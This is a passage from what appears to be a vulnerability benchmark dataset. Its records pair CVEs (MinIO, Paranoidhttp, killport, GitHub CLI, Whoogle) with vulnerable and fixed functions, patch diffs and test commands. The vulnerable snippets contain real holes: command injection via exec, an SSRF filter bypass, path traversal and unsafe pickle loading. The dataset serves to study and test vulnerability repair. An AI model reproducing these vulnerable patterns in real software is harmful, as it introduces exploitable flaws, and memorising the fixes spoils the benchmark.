nil\n\t\t}\n\t}\n\topts := updateServiceAccountOpts{\n\t\tsecretKey: updateReq.NewSecretKey,\n\t\tstatus: updateReq.NewStatus,\n\t\tname: updateReq.NewName,\n\t\tdescription: updateReq.NewDescription,\n\t\texpiration: updateReq.NewExpiration,\n\t\tsessionPolicy: sp,\n\t}\n\tupdatedAt, err := globalIAMSys.UpdateServiceAccount(ctx, accessKey, opts)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\t// Call site replication hook - non-root user accounts are replicated.\n\tif svcAccount.ParentUser != globalActiveCred.AccessKey {\n\t\tlogger.LogIf(ctx, globalSiteReplicationSys.IAMChangeHook(ctx, madmin.SRIAMItem{\n\t\t\tType: madmin.SRIAMItemSvcAcc,\n\t\t\tSvcAccChange: &madmin.SRSvcAccChange{\n\t\t\t\tUpdate: &madmin.SRSvcAccUpdate{\n\t\t\t\t\tAccessKey: accessKey,\n\t\t\t\t\tSecretKey: opts.secretKey,\n\t\t\t\t\tStatus: opts.status,\n\t\t\t\t\tName: opts.name,\n\t\t\t\t\tDescription: opts.description,\n\t\t\t\t\tSessionPolicy: updateReq.NewPolicy,\n\t\t\t\t\tExpiration: updateReq.NewExpiration,\n\t\t\t\t},\n\t\t\t},\n\t\t\tUpdatedAt: updatedAt,\n\t\t}))\n\t}\n\n\twriteSuccessNoContent(w)\n}"}], "fix_func": [{"id": "fix_go_73_1", "commit": "0ae4915", "file_path": "cmd/admin-handlers-users.go", "start_line": "749", "end_line": "864", "snippet": "func (a adminAPIHandlers) UpdateServiceAccount(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\n\t// Get current object layer instance.\n\tobjectAPI := newObjectLayerFn()\n\tif objectAPI == nil || globalNotificationSys == nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrServerNotInitialized), r.URL)\n\t\treturn\n\t}\n\n\tcred, owner, s3Err := validateAdminSignature(ctx, r, \"\")\n\tif s3Err != ErrNone {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)\n\t\treturn\n\t}\n\n\taccessKey := mux.Vars(r)[\"accessKey\"]\n\tif accessKey == \"\" {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrInvalidRequest), r.URL)\n\t\treturn\n\t}\n\n\tsvcAccount, _, err := globalIAMSys.GetServiceAccount(ctx, accessKey)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\t// Permission checks:\n\t//\n\t// 1. Any type of account (i.e. access keys (previously/still called service\n\t// accounts), STS accounts, internal IDP accounts, etc) with the\n\t// policy.UpdateServiceAccountAdminAction permission can update any service\n\t// account.\n\t//\n\t// 2. We would like to let a user update their own access keys, however it\n\t// is currently blocked pending a re-design. Users are still able to delete\n\t// and re-create them.\n\tif !globalIAMSys.IsAllowed(policy.Args{\n\t\tAccountName: cred.AccessKey,\n\t\tGroups: cred.Groups,\n\t\tAction: policy.UpdateServiceAccountAdminAction,\n\t\tConditionValues: getConditionValues(r, \"\", cred),\n\t\tIsOwner: owner,\n\t\tClaims: cred.Claims,\n\t}) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n\t\treturn\n\t}\n\n\tpassword := cred.SecretKey\n\treqBytes, err := madmin.DecryptData(password, io.LimitReader(r.Body, r.ContentLength))\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErrWithErr(ErrAdminConfigBadJSON, err), r.URL)\n\t\treturn\n\t}\n\n\tvar updateReq madmin.UpdateServiceAccountReq\n\tif err = json.Unmarshal(reqBytes, &updateReq); err != nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErrWithErr(ErrAdminConfigBadJSON, err), r.URL)\n\t\treturn\n\t}\n\n\tif err := updateReq.Validate(); err != nil {\n\t\t// Since this validation would happen client side as well, we only send\n\t\t// a generic error message here.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminResourceInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tvar sp *policy.Policy\n\tif len(updateReq.NewPolicy) > 0 {\n\t\tsp, err = policy.ParseConfig(bytes.NewReader(updateReq.NewPolicy))\n\t\tif err != nil {\n\t\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\t\treturn\n\t\t}\n\t\tif sp.Version == \"\" && len(sp.Statements) == 0 {\n\t\t\tsp = nil\n\t\t}\n\t}\n\topts := updateServiceAccountOpts{\n\t\tsecretKey: updateReq.NewSecretKey,\n\t\tstatus: updateReq.NewStatus,\n\t\tname: updateReq.NewName,\n\t\tdescription: updateReq.NewDescription,\n\t\texpiration: updateReq.NewExpiration,\n\t\tsessionPolicy: sp,\n\t}\n\tupdatedAt, err := globalIAMSys.UpdateServiceAccount(ctx, accessKey, opts)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\t// Call site replication hook - non-root user accounts are replicated.\n\tif svcAccount.ParentUser != globalActiveCred.AccessKey {\n\t\tlogger.LogIf(ctx, globalSiteReplicationSys.IAMChangeHook(ctx, madmin.SRIAMItem{\n\t\t\tType: madmin.SRIAMItemSvcAcc,\n\t\t\tSvcAccChange: &madmin.SRSvcAccChange{\n\t\t\t\tUpdate: &madmin.SRSvcAccUpdate{\n\t\t\t\t\tAccessKey: accessKey,\n\t\t\t\t\tSecretKey: opts.secretKey,\n\t\t\t\t\tStatus: opts.status,\n\t\t\t\t\tName: opts.name,\n\t\t\t\t\tDescription: opts.description,\n\t\t\t\t\tSessionPolicy: updateReq.NewPolicy,\n\t\t\t\t\tExpiration: updateReq.NewExpiration,\n\t\t\t\t},\n\t\t\t},\n\t\t\tUpdatedAt: updatedAt,\n\t\t}))\n\t}\n\n\twriteSuccessNoContent(w)\n}"}], "vul_patch": "--- a/cmd/admin-handlers-users.go\n+++ b/cmd/admin-handlers-users.go\n@@ -26,6 +26,16 @@\n \t\treturn\n \t}\n \n+\t// Permission checks:\n+\t//\n+\t// 1. Any type of account (i.e. access keys (previously/still called service\n+\t// accounts), STS accounts, internal IDP accounts, etc) with the\n+\t// policy.UpdateServiceAccountAdminAction permission can update any service\n+\t// account.\n+\t//\n+\t// 2. We would like to let a user update their own access keys, however it\n+\t// is currently blocked pending a re-design. Users are still able to delete\n+\t// and re-create them.\n \tif !globalIAMSys.IsAllowed(policy.Args{\n \t\tAccountName: cred.AccessKey,\n \t\tGroups: cred.Groups,\n@@ -34,15 +44,8 @@\n \t\tIsOwner: owner,\n \t\tClaims: cred.Claims,\n \t}) {\n-\t\trequestUser := cred.AccessKey\n-\t\tif cred.ParentUser != \"\" {\n-\t\t\trequestUser = cred.ParentUser\n-\t\t}\n-\n-\t\tif requestUser != svcAccount.ParentUser {\n-\t\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n-\t\t\treturn\n-\t\t}\n+\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n+\t\treturn\n \t}\n \n \tpassword := cred.SecretKey\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-24747:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/minio\nrm -rf ./cmd/admin-handlers-users_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -run ^TestIAMInternalIDPServerSuite$ github.com/minio/minio/cmd\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-24747:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/minio\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd cmd && go test -run -v \n"} {"cve_id": "CVE-2023-24623", "cve_description": "Paranoidhttp before 0.3.0 allows SSRF because [::] is equivalent to the 127.0.0.1 address, but does not match the filter for private addresses.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/hakobe/paranoidhttp", "patch_url": ["https://github.com/hakobe/paranoidhttp/commit/07f671da14ce63a80f4e52432b32e8d178d75fd3"], "programing_language": "Go", "vul_func": [{"id": "vul_go_40_1", "commit": "a5a8577", "file_path": "client.go", "start_line": 112, "end_line": 157, "snippet": "func safeAddr(ctx context.Context, resolver *net.Resolver, hostport string, opts ...Option) (string, error) {\n\tc := basicConfig()\n\tfor _, opt := range opts {\n\t\topt(c)\n\t}\n\thost, port, err := net.SplitHostPort(hostport)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tip := net.ParseIP(host)\n\tif ip != nil {\n\t\tif ip.To4() != nil && c.isIPForbidden(ip) {\n\t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", ip)\n\t\t}\n\t\treturn net.JoinHostPort(ip.String(), port), nil\n\t}\n\n\tif c.isHostForbidden(host) {\n\t\treturn \"\", fmt.Errorf(\"bad host is detected: %v\", host)\n\t}\n\n\tr := resolver\n\tif r == nil {\n\t\tr = net.DefaultResolver\n\t}\n\taddrs, err := r.LookupIPAddr(ctx, host)\n\tif err != nil || len(addrs) <= 0 {\n\t\treturn \"\", err\n\t}\n\tsafeAddrs := make([]net.IPAddr, 0, len(addrs))\n\tfor _, addr := range addrs {\n\t\t// only support IPv4 address\n\t\tif addr.IP.To4() == nil {\n\t\t\tcontinue\n\t\t}\n\t\tif c.isIPForbidden(addr.IP) {\n\t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", addr.IP)\n\t\t}\n\t\tsafeAddrs = append(safeAddrs, addr)\n\t}\n\tif len(safeAddrs) == 0 {\n\t\treturn \"\", fmt.Errorf(\"fail to lookup ip addr: %v\", host)\n\t}\n\treturn net.JoinHostPort(safeAddrs[0].IP.String(), port), nil\n}"}], "fix_func": [{"id": "fix_go_40_1", "commit": "07f671d", "file_path": "client.go", "start_line": 112, "end_line": 157, "snippet": "func safeAddr(ctx context.Context, resolver *net.Resolver, hostport string, opts ...Option) (string, error) {\n\tc := basicConfig()\n\tfor _, opt := range opts {\n\t\topt(c)\n\t}\n\thost, port, err := net.SplitHostPort(hostport)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tip := net.ParseIP(host)\n\tif ip != nil {\n\t\tif ip.IsUnspecified() || (ip.To4() != nil && c.isIPForbidden(ip)) {\n\t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", ip)\n\t\t}\n\t\treturn net.JoinHostPort(ip.String(), port), nil\n\t}\n\n\tif c.isHostForbidden(host) {\n\t\treturn \"\", fmt.Errorf(\"bad host is detected: %v\", host)\n\t}\n\n\tr := resolver\n\tif r == nil {\n\t\tr = net.DefaultResolver\n\t}\n\taddrs, err := r.LookupIPAddr(ctx, host)\n\tif err != nil || len(addrs) <= 0 {\n\t\treturn \"\", err\n\t}\n\tsafeAddrs := make([]net.IPAddr, 0, len(addrs))\n\tfor _, addr := range addrs {\n\t\t// only support IPv4 address\n\t\tif addr.IP.To4() == nil {\n\t\t\tcontinue\n\t\t}\n\t\tif c.isIPForbidden(addr.IP) {\n\t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", addr.IP)\n\t\t}\n\t\tsafeAddrs = append(safeAddrs, addr)\n\t}\n\tif len(safeAddrs) == 0 {\n\t\treturn \"\", fmt.Errorf(\"fail to lookup ip addr: %v\", host)\n\t}\n\treturn net.JoinHostPort(safeAddrs[0].IP.String(), port), nil\n}"}], "vul_patch": "--- a/client.go\n+++ b/client.go\n@@ -10,7 +10,7 @@\n \n \tip := net.ParseIP(host)\n \tif ip != nil {\n-\t\tif ip.To4() != nil && c.isIPForbidden(ip) {\n+\t\tif ip.IsUnspecified() || (ip.To4() != nil && c.isIPForbidden(ip)) {\n \t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", ip)\n \t\t}\n \t\treturn net.JoinHostPort(ip.String(), port), nil\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-24623:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/paranoidhttp\nrm -rf ./client_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestRequest$ github.com/hakobe/paranoidhttp\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-24623:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/paranoidhttp\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -v github.com/hakobe/paranoidhttp\n"} {"cve_id": "CVE-2021-23360", "cve_description": "This affects the package killport before 1.0.2. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization. Running this PoC will cause the command touch success to be executed, leading to the creation of a file called success.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/ssnau/killport", "patch_url": ["https://github.com/ssnau/killport/commit/bec8e371f170a12e11cd222ffc7a6e1ae9942638"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_105_1", "commit": "5268f23", "file_path": "index.js", "start_line": 6, "end_line": 43, "snippet": "module.exports = function killport(port) {\n return (new Promise(function(resolve, reject) {\n var cmd = 'lsof -i:' + port; \n cp.exec(cmd, function(err, stdout, stderr){\n // do not check `err`, if no process found\n // err will be an instance of Error\n if (stderr) return reject(stderr);\n var lines = String(stdout).split('\\n').filter(notEmpty);\n var pids = lines.map(function(line){\n var blocks = line.split(/\\s+/);\n if (blocks[1] && +blocks[1]) {\n return +blocks[1];\n }\n return null;\n }).filter(notEmpty);\n\n if (!pids.length) {\n return resolve('no pids found');\n }\n\n var infs = [];\n return async.each(pids, function(pid, next) {\n console.log('kill ' + pid);\n cp.exec('kill ' + pid, function (err, stdout, stderr) {\n infs.push({\n pid: pid,\n err: err,\n stderr: stderr,\n stdout: stdout\n });\n next();\n });\n }, function(err) {\n resolve(infs);\n });\n });\n }))\n};"}], "fix_func": [{"id": "fix_js_105_1", "commit": "bec8e37", "file_path": "index.js", "start_line": 6, "end_line": 44, "snippet": "module.exports = function killport(port) {\n return (new Promise(function(resolve, reject) {\n if (!/^\\d+$/.test(port)) throw new Error('port must be a number.');\n var cmd = 'lsof -i:' + port; \n cp.exec(cmd, function(err, stdout, stderr){\n // do not check `err`, if no process found\n // err will be an instance of Error\n if (stderr) return reject(stderr);\n var lines = String(stdout).split('\\n').filter(notEmpty);\n var pids = lines.map(function(line){\n var blocks = line.split(/\\s+/);\n if (blocks[1] && +blocks[1]) {\n return +blocks[1];\n }\n return null;\n }).filter(notEmpty);\n\n if (!pids.length) {\n return resolve('no pids found');\n }\n\n var infs = [];\n return async.each(pids, function(pid, next) {\n console.log('kill ' + pid);\n cp.exec('kill ' + pid, function (err, stdout, stderr) {\n infs.push({\n pid: pid,\n err: err,\n stderr: stderr,\n stdout: stdout\n });\n next();\n });\n }, function(err) {\n resolve(infs);\n });\n });\n }))\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,5 +1,6 @@\n module.exports = function killport(port) {\n return (new Promise(function(resolve, reject) {\n+ if (!/^\\d+$/.test(port)) throw new Error('port must be a number.');\n var cmd = 'lsof -i:' + port; \n cp.exec(cmd, function(err, stdout, stderr){\n // do not check `err`, if no process found\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-54132", "cve_description": "The GitHub CLI is GitHub\u2019s official command line tool. A security vulnerability has been identified in GitHub CLI that could create or overwrite files in unintended directories when users download a malicious GitHub Actions workflow artifact through gh run download. This vulnerability stems from a GitHub Actions workflow artifact named .. when downloaded using gh run download. The artifact name and --dir flag are used to determine the artifact\u2019s download path. When the artifact is named .., the resulting files within the artifact are extracted exactly 1 directory higher than the specified --dir flag value. This vulnerability is fixed in 2.63.1.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/cli/cli", "patch_url": ["https://github.com/cli/cli/commit/1136764c369aaf0cae4ec2ee09dc35d871076932"], "programing_language": "Go", "vul_func": [{"id": "vul_go_21_1", "commit": "7c241cf", "file_path": "pkg/cmd/run/download/download.go", "start_line": 106, "end_line": 184, "snippet": "func runDownload(opts *DownloadOptions) error {\n\topts.IO.StartProgressIndicator()\n\tartifacts, err := opts.Platform.List(opts.RunID)\n\topts.IO.StopProgressIndicator()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error fetching artifacts: %w\", err)\n\t}\n\n\tnumValidArtifacts := 0\n\tfor _, a := range artifacts {\n\t\tif a.Expired {\n\t\t\tcontinue\n\t\t}\n\t\tnumValidArtifacts++\n\t}\n\tif numValidArtifacts == 0 {\n\t\treturn errors.New(\"no valid artifacts found to download\")\n\t}\n\n\twantPatterns := opts.FilePatterns\n\twantNames := opts.Names\n\tif opts.DoPrompt {\n\t\tartifactNames := set.NewStringSet()\n\t\tfor _, a := range artifacts {\n\t\t\tif !a.Expired {\n\t\t\t\tartifactNames.Add(a.Name)\n\t\t\t}\n\t\t}\n\t\toptions := artifactNames.ToSlice()\n\t\tif len(options) > 10 {\n\t\t\toptions = options[:10]\n\t\t}\n\t\tvar selected []int\n\t\tif selected, err = opts.Prompter.MultiSelect(\"Select artifacts to download:\", nil, options); err != nil {\n\t\t\treturn err\n\t\t}\n\t\twantNames = []string{}\n\t\tfor _, x := range selected {\n\t\t\twantNames = append(wantNames, options[x])\n\t\t}\n\t\tif len(wantNames) == 0 {\n\t\t\treturn errors.New(\"no artifacts selected\")\n\t\t}\n\t}\n\n\topts.IO.StartProgressIndicator()\n\tdefer opts.IO.StopProgressIndicator()\n\n\t// track downloaded artifacts and avoid re-downloading any of the same name\n\tdownloaded := set.NewStringSet()\n\tfor _, a := range artifacts {\n\t\tif a.Expired {\n\t\t\tcontinue\n\t\t}\n\t\tif downloaded.Contains(a.Name) {\n\t\t\tcontinue\n\t\t}\n\t\tif len(wantNames) > 0 || len(wantPatterns) > 0 {\n\t\t\tif !matchAnyName(wantNames, a.Name) && !matchAnyPattern(wantPatterns, a.Name) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tdestDir := opts.DestinationDir\n\t\tif len(wantPatterns) != 0 || len(wantNames) != 1 {\n\t\t\tdestDir = filepath.Join(destDir, a.Name)\n\t\t}\n\t\terr := opts.Platform.Download(a.DownloadURL, destDir)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error downloading %s: %w\", a.Name, err)\n\t\t}\n\t\tdownloaded.Add(a.Name)\n\t}\n\n\tif downloaded.Len() == 0 {\n\t\treturn errors.New(\"no artifact matches any of the names or patterns provided\")\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_21_1", "commit": "1136764", "file_path": "pkg/cmd/run/download/download.go", "start_line": 106, "end_line": 211, "snippet": "func runDownload(opts *DownloadOptions) error {\n\topts.IO.StartProgressIndicator()\n\tartifacts, err := opts.Platform.List(opts.RunID)\n\topts.IO.StopProgressIndicator()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error fetching artifacts: %w\", err)\n\t}\n\n\tnumValidArtifacts := 0\n\tfor _, a := range artifacts {\n\t\tif a.Expired {\n\t\t\tcontinue\n\t\t}\n\t\tnumValidArtifacts++\n\t}\n\tif numValidArtifacts == 0 {\n\t\treturn errors.New(\"no valid artifacts found to download\")\n\t}\n\n\twantPatterns := opts.FilePatterns\n\twantNames := opts.Names\n\tif opts.DoPrompt {\n\t\tartifactNames := set.NewStringSet()\n\t\tfor _, a := range artifacts {\n\t\t\tif !a.Expired {\n\t\t\t\tartifactNames.Add(a.Name)\n\t\t\t}\n\t\t}\n\t\toptions := artifactNames.ToSlice()\n\t\tif len(options) > 10 {\n\t\t\toptions = options[:10]\n\t\t}\n\t\tvar selected []int\n\t\tif selected, err = opts.Prompter.MultiSelect(\"Select artifacts to download:\", nil, options); err != nil {\n\t\t\treturn err\n\t\t}\n\t\twantNames = []string{}\n\t\tfor _, x := range selected {\n\t\t\twantNames = append(wantNames, options[x])\n\t\t}\n\t\tif len(wantNames) == 0 {\n\t\t\treturn errors.New(\"no artifacts selected\")\n\t\t}\n\t}\n\n\topts.IO.StartProgressIndicator()\n\tdefer opts.IO.StopProgressIndicator()\n\n\t// track downloaded artifacts and avoid re-downloading any of the same name, isolate if multiple artifacts\n\tdownloaded := set.NewStringSet()\n\tisolateArtifacts := isolateArtifacts(wantNames, wantPatterns)\n\n\tfor _, a := range artifacts {\n\t\tif a.Expired {\n\t\t\tcontinue\n\t\t}\n\t\tif downloaded.Contains(a.Name) {\n\t\t\tcontinue\n\t\t}\n\t\tif len(wantNames) > 0 || len(wantPatterns) > 0 {\n\t\t\tif !matchAnyName(wantNames, a.Name) && !matchAnyPattern(wantPatterns, a.Name) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\tdestDir := opts.DestinationDir\n\t\tif isolateArtifacts {\n\t\t\tdestDir = filepath.Join(destDir, a.Name)\n\t\t}\n\n\t\tif !filepathDescendsFrom(destDir, opts.DestinationDir) {\n\t\t\treturn fmt.Errorf(\"error downloading %s: would result in path traversal\", a.Name)\n\t\t}\n\n\t\terr := opts.Platform.Download(a.DownloadURL, destDir)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error downloading %s: %w\", a.Name, err)\n\t\t}\n\t\tdownloaded.Add(a.Name)\n\t}\n\n\tif downloaded.Len() == 0 {\n\t\treturn errors.New(\"no artifact matches any of the names or patterns provided\")\n\t}\n\n\treturn nil\n}\n\nfunc isolateArtifacts(wantNames []string, wantPatterns []string) bool {\n\tif len(wantPatterns) > 0 {\n\t\t// Patterns can match multiple artifacts\n\t\treturn true\n\t}\n\n\tif len(wantNames) == 0 {\n\t\t// All artifacts wanted regardless what they are named\n\t\treturn true\n\t}\n\n\tif len(wantNames) > 1 {\n\t\t// Multiple, specific artifacts wanted\n\t\treturn true\n\t}\n\n\treturn false\n}"}, {"id": "fix_go_21_2", "commit": "1136764", "file_path": "pkg/cmd/run/download/zip.go", "start_line": 73, "end_line": 95, "snippet": "func filepathDescendsFrom(p, dir string) bool {\n\t// Regardless of the logic below, `p` is never allowed to be current directory `.` or parent directory `..`\n\t// however we check explicitly here before filepath.Rel() which doesn't cover all cases.\n\tp = filepath.Clean(p)\n\n\tif p == \".\" || p == \"..\" {\n\t\treturn false\n\t}\n\n\t// filepathDescendsFrom() takes advantage of filepath.Rel() to determine if `p` is descended from `dir`:\n\t//\n\t// 1. filepath.Rel() calculates a path to traversal from fictious `dir` to `p`.\n\t// 2. filepath.Rel() errors in a handful of cases where absolute and relative paths are compared as well as certain traversal edge cases\n\t// For more information, https://github.com/golang/go/blob/00709919d09904b17cfe3bfeb35521cbd3fb04f8/src/path/filepath/path_test.go#L1510-L1515\n\t// 3. If the path to traverse `dir` to `p` requires `..`, then we know it is not descend from / contained in `dir`\n\t//\n\t// As-is, this function requires the caller to ensure `p` and `dir` are either 1) both relative or 2) both absolute.\n\trelativePath, err := filepath.Rel(dir, p)\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn !strings.HasPrefix(relativePath, \"..\")\n}"}], "vul_patch": "--- a/pkg/cmd/run/download/download.go\n+++ b/pkg/cmd/run/download/download.go\n@@ -46,8 +46,10 @@\n \topts.IO.StartProgressIndicator()\n \tdefer opts.IO.StopProgressIndicator()\n \n-\t// track downloaded artifacts and avoid re-downloading any of the same name\n+\t// track downloaded artifacts and avoid re-downloading any of the same name, isolate if multiple artifacts\n \tdownloaded := set.NewStringSet()\n+\tisolateArtifacts := isolateArtifacts(wantNames, wantPatterns)\n+\n \tfor _, a := range artifacts {\n \t\tif a.Expired {\n \t\t\tcontinue\n@@ -60,10 +62,16 @@\n \t\t\t\tcontinue\n \t\t\t}\n \t\t}\n+\n \t\tdestDir := opts.DestinationDir\n-\t\tif len(wantPatterns) != 0 || len(wantNames) != 1 {\n+\t\tif isolateArtifacts {\n \t\t\tdestDir = filepath.Join(destDir, a.Name)\n \t\t}\n+\n+\t\tif !filepathDescendsFrom(destDir, opts.DestinationDir) {\n+\t\t\treturn fmt.Errorf(\"error downloading %s: would result in path traversal\", a.Name)\n+\t\t}\n+\n \t\terr := opts.Platform.Download(a.DownloadURL, destDir)\n \t\tif err != nil {\n \t\t\treturn fmt.Errorf(\"error downloading %s: %w\", a.Name, err)\n@@ -77,3 +85,22 @@\n \n \treturn nil\n }\n+\n+func isolateArtifacts(wantNames []string, wantPatterns []string) bool {\n+\tif len(wantPatterns) > 0 {\n+\t\t// Patterns can match multiple artifacts\n+\t\treturn true\n+\t}\n+\n+\tif len(wantNames) == 0 {\n+\t\t// All artifacts wanted regardless what they are named\n+\t\treturn true\n+\t}\n+\n+\tif len(wantNames) > 1 {\n+\t\t// Multiple, specific artifacts wanted\n+\t\treturn true\n+\t}\n+\n+\treturn false\n+}\n\n--- /dev/null\n+++ b/pkg/cmd/run/download/download.go\n@@ -0,0 +1,23 @@\n+func filepathDescendsFrom(p, dir string) bool {\n+\t// Regardless of the logic below, `p` is never allowed to be current directory `.` or parent directory `..`\n+\t// however we check explicitly here before filepath.Rel() which doesn't cover all cases.\n+\tp = filepath.Clean(p)\n+\n+\tif p == \".\" || p == \"..\" {\n+\t\treturn false\n+\t}\n+\n+\t// filepathDescendsFrom() takes advantage of filepath.Rel() to determine if `p` is descended from `dir`:\n+\t//\n+\t// 1. filepath.Rel() calculates a path to traversal from fictious `dir` to `p`.\n+\t// 2. filepath.Rel() errors in a handful of cases where absolute and relative paths are compared as well as certain traversal edge cases\n+\t// For more information, https://github.com/golang/go/blob/00709919d09904b17cfe3bfeb35521cbd3fb04f8/src/path/filepath/path_test.go#L1510-L1515\n+\t// 3. If the path to traverse `dir` to `p` requires `..`, then we know it is not descend from / contained in `dir`\n+\t//\n+\t// As-is, this function requires the caller to ensure `p` and `dir` are either 1) both relative or 2) both absolute.\n+\trelativePath, err := filepath.Rel(dir, p)\n+\tif err != nil {\n+\t\treturn false\n+\t}\n+\treturn !strings.HasPrefix(relativePath, \"..\")\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-54132:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cli\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^Test_runDownload$ github.com/cli/cli/v2/pkg/cmd/run/download\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-54132:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/cli\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(Test_NewCmdDownload|Test_filepathDescendsFrom|Test_extractZip)$' github.com/cli/cli/v2/pkg/cmd/run/download"} {"cve_id": "CVE-2024-22205", "cve_description": "Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `window` endpoint does not sanitize user-supplied input from the `location` variable and passes it to the `send` method which sends a `GET` request on lines 339-343 in `request.py,` which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4.\n\n", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/benbusby/whoogle-search", "patch_url": ["https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda"], "programing_language": "Python", "vul_func": [{"id": "vul_py_189_1", "commit": "8830615", "file_path": "app/routes.py", "start_line": 419, "end_line": 452, "snippet": "def config():\n config_disabled = (\n app.config['CONFIG_DISABLE'] or\n not valid_user_session(session))\n if request.method == 'GET':\n return json.dumps(g.user_config.__dict__)\n elif request.method == 'PUT' and not config_disabled:\n if 'name' in request.args:\n config_pkl = os.path.join(\n app.config['CONFIG_PATH'],\n request.args.get('name'))\n session['config'] = (pickle.load(open(config_pkl, 'rb'))\n if os.path.exists(config_pkl)\n else session['config'])\n return json.dumps(session['config'])\n else:\n return json.dumps({})\n elif not config_disabled:\n config_data = request.form.to_dict()\n if 'url' not in config_data or not config_data['url']:\n config_data['url'] = g.user_config.url\n\n # Save config by name to 